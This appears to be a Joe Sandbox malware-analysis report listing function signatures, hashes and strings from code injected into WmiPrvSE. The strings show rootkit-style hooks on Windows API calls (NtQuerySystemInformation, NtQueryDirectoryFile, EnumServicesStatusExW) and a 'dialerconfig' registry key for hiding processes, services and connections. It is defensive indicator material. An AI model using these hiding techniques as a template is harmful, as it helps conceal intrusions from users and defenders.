                        • Instruction ID: d3f982dc862d602c40ba63ae0032ffd45163821349919f8b64887fffb8d05af6
                        • Opcode Fuzzy Hash: d75aecba9ac61c9fb542969a54dbcc8f2d065bcf5d1713c95c0cfb5eef25cc87
                        • Instruction Fuzzy Hash: 8D014F3A614C8881DF45EF26CC551ACA334EBC9FC5F19A031AE0E47657CE38C980C768
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                        • Instruction ID: ca10fe7734c9c7278bdd4f6fbd3a440c7b64844bd6f8eda726c19684b87b050a
                        • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                        • Instruction Fuzzy Hash: 0EF068727156588EDB98CF68A80772977D1F3083C1FD09019D68983B04D33C9161CF38

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: b28245cc656f595477a83de0c15fa56278a29a739d6942d7fb79e90936adee15
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: AE711A7A310E1886EB10DF66EC48699A364F784FCAF01A121DE4E43B69DF39C644C768

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: f9ff387f13c0959c8a23f4d30d29af16b906c58c3494800ae6f125faa080eb5d
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: BA516E36600F8886EB54CF66E94835AB7A1F789FCAF049124DE4A07718DF3DC249CB24

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 4fcf581849ae61ccd9ad8cf5b6ea06c6d89f465f7fd4aa92a7aac4b6d607ae17
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: 4D3182B8200D4EA0EF05EBA9EC596E4A320F7047DAFC07423940A12575AF7D934DCBB8

                        Control-flow Graph

                        • Control-flow graph rendering (legend: Executed / Not Executed) for the function starting at basic block 2534cf66910; node and edge data of the interactive graph not reproduced
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 8283b683ce621deceefdce4d279fc40c765215b5d65e80d87ea9b345807b08ce
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: DC81EF31700E0E86FA54EB259C4939963A0EB857C2F54B0259A09877B6DB3CCB47873C

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 000002534CF9CE37
                        • FlsGetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CE4C
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CE6D
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CE9A
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CEAB
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CEBC
                        • SetLastError.KERNEL32 ref: 000002534CF9CED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,000002534CF9ECCC,?,?,?,?,000002534CF9BF9F,?,?,?,?,?,000002534CF97AB0), ref: 000002534CF9CF2C
                          • Part of subcall function 000002534CF9D6CC: HeapAlloc.KERNEL32 ref: 000002534CF9D721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF54
                          • Part of subcall function 000002534CF9D744: HeapFree.KERNEL32 ref: 000002534CF9D75A
                          • Part of subcall function 000002534CF9D744: GetLastError.KERNEL32 ref: 000002534CF9D764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF76
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 3f0794cb1c2ef0af2c0caf66dd72297162897cd031812cfd9cfd725adc311937
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: F94150B4201E4C42FE68E7325D5D369A1525B847F6F287724A937066D6FE3C86015F38

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 4ca35dfbd84312bba87617b9bd95db43a8b4a770f8c6456f180c50fa2555e147
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: AD217176614B4482FB10CB25F84836AB7A0F784BE6F505215DA5903BA8CF7DC249CF24

                        Control-flow Graph

                        • Control-flow graph rendering (legend: Executed / Not Executed) for the function starting at basic block 2534cf69944; node and edge data of the interactive graph not reproduced
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: cedc45b2039a669dff0fc799c37f554eb18c62e3ff41ad17fc00d577efd92c3d
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: AFE1AF32704B488AEB60DF65D88839D77A0F755BCAF502115EE8957BA9CB38C392C734

                        Control-flow Graph

                        • Control-flow graph rendering (legend: Executed / Not Executed) for the function starting at basic block 2534cf9a544; node and edge data of the interactive graph not reproduced
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: 83b48ec1d077457499048f56674a00a6029857d6d74a1c26e7f405f77ef68fcf
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: 58E19E72600F488AEF60DF65D88839DB7A0F7457D9F112125EE8957B99CB38C681CB24

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: 4eced2d1dd9186fd5b10d210237559a66dfb395b3508132be4cd6a27d2cbdec3
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 4D41D232311E0881FF16CB1AEC08755A391F749BE2F5961259D0A8B788EF3CC6458B3C

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: e927927bb38551d0b9d4f45b83d57f70a97df837d7680b4eaa54c2d7f96199d3
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 28415E76214F88D6EB60CF21E84839AB7B5F388BD9F049129DA8907758DF3DC585CB24

                        Control-flow Graph

                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D087
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0A6
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0CE
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0DF
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 41d44c75d4b2457e64776896c796c5e007bcf3e0c574cbc87217c4d3b4c4c12f
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: B1115E31704A4C41FE68E7269D5D379A1515B847F2F387324A939076EAEE3CC6428F38
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 2fd2608fdd1211338c9734535b40e593d6acdef1f7de804d9e8caa3e3a4f4447
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 6C81B331600F0D86FF54EB259C49399E6A0A785BC2F14B427DA04877AAEB3DC7458F38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: b43c9f2ab16254cd1f2e3c115cbfae8e9ebd510332e8c0a71c4c46cf07ee8cf7
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: B031E731312E44D1EE52EB42AC08795A294F748BE1F1A25259D1D07B90EF3DC3858B38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 07a8d41bfeedb0d4c3c86574e8f2a826507f240d56ae809e2b6400b767bee90d
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: A011B231310F8883E750CB12EC58319B6A0F388FE6F045215EA2A87794DF3DCA048768
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: a6493bf056a0438285f3c0b8694f1dff551606326c8ed50b8942cd29f198f011
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: B9115E3A704F4582EF14DB12E80826AA6A0F748FC6F455029DE9907764EF3EC649CB28
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction ID: a5b2469d1511555b14123b9b5485a4073d553594469f9a54d61cabe2988fb088
                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction Fuzzy Hash: 99D19D76209F4881DA70DB1AE89435ABBA0F388BC5F105216EACD47B69DF3CD651CF24
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 7663dc7bf17fc5fe6a3a2d294d4060912201f2bca28c875475bff2552975c244
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: 9C31D236701F5982EA14DF56ED48729E7A0FB44BCAF0860209E4907B65EF3CC6A5CB34
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: f95a6cc405d3c87c420d874699386ead1cad166d02285fde4b5aec12a7c91dcd
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: D9116D30200E4841FE64E7325D4D329A2526B847F6F246724A936476EAEE3C86019F38
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 19a78f3271c08fa92a2d3bb1cfb180086516d63fb4c1913a1cce41f12a818499
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: 62016931300E4882EB24DB52A84C35AA3A5F788FC6F889035DE5943755DF3DCA8AC724
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: 593f7399cfa294ac90c854531880f2d4f99691f3101b391e5e0680ebf12aa757
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: E9010979611F4886EF24DB62EC0C32AA2A0FB49FC7F045424C95906764EF3EC248CB38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: d4d39927be187ed5c5f17ba9199a94246eb0682ae2d5496d6d30bec27fce7870
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 0751B532701A088AEF54DB15EC4CB59B7A5F344BC9F53A124DA1A43B48DB79CB81CB38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 3b5ecdca5592297688fdb70718cee288d97b5987abc6a79a2048bbdd886acfc0
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 17319332200A4496EB14DF21EC4C719B7A5F744BCAF169514EE5A07B59DB3ECB81CB38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: afedcdf10490bc59e1e16d3a39bab99468e138ca10dee16280622698a6b6d981
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 30F08132300A4882EB60CB21EC88359E761F748BC9F94A020CA4946554DB7DCB8ECB24
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 10dc7ad9069a52359524467aa6e40d0f7ad6da848b1c4c06426e1e09ecd697b2
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: 58F04F71221E0881EF20CB25AC48359A360EB85BE2F5422198A6A452F4CF3EC6458774
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: 169fdc341a69a9214f44a9d34521551635983f9b48094eb7e62a5718eb473e7b
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: A5F05830204F8882EA04CB12BD08119E260EB48FC6F18A020EE5A07B28DE3DC64A8738
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction ID: 09d17569973177fe28b38372ce3407ce51e95f8b5e79cf97ab1a6745fe4387ab
                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction Fuzzy Hash: 3402DA32219B8886EB60CB55F89435ABBA0F3C47C5F105115EA8E87BA9DF7CD544CF24
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction ID: 9e0e80b7ee65ffd4612b114093426ee84eb65cf02cd4d142d681c87835823808
                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction Fuzzy Hash: BB61EF36519F48C6EB64CB15F84831ABBA4F3887C5F106215EA8D47BA8DB7CD644CF28
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: _set_statfp
